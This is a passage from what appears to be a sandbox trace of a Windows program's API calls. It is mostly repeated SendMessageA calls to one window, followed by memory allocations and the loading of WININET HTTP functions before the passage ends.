returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.196] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.197] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.198] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.199] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.200] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.201] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.202] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.203] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.204] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.205] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.206] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.207] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.208] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.208] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.208] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.213] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.213] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.213] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.213] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.213] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.213] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.213] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.214] SendMessageA (hWnd=0x60046, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0124.215] DestroyWindow (hWnd=0x60046) [0124.215] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0124.216] PostQuitMessage (nExitCode=6) [0124.219] NtdllDefWindowProc_A (hWnd=0x60046, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0124.240] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0124.240] UpdateWindow (hWnd=0x0) returned 0 [0124.240] GetMessageA (in: lpMsg=0x505248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x505248) returned 0 [0124.242] VirtualAlloc (lpAddress=0x0, dwSize=0x48e4, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0124.242] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0124.243] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x460000 [0124.243] VirtualAlloc (lpAddress=0x460000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x460000 [0124.243] VirtualAlloc (lpAddress=0x461000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x461000 [0124.243] VirtualAlloc (lpAddress=0x462000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x462000 [0124.243] VirtualAlloc (lpAddress=0x463000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x463000 [0124.243] VirtualAlloc (lpAddress=0x464000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x464000 [0124.244] VirtualAlloc (lpAddress=0x465000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x465000 [0124.244] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x715c0000 [0124.319] GetProcAddress (hModule=0x715c0000, lpProcName="HttpSendRequestW") returned 0x71686ef0 [0124.319] GetProcAddress (hModule=0x715c0000, lpProcName="InternetSetOptionW") returned 0x7168da70 [0124.319] GetProcAddress (hModule=0x715c0000, lpProcName="InternetQueryOptionW") returned 0x7168cd20 [0124.319] GetProcAddress 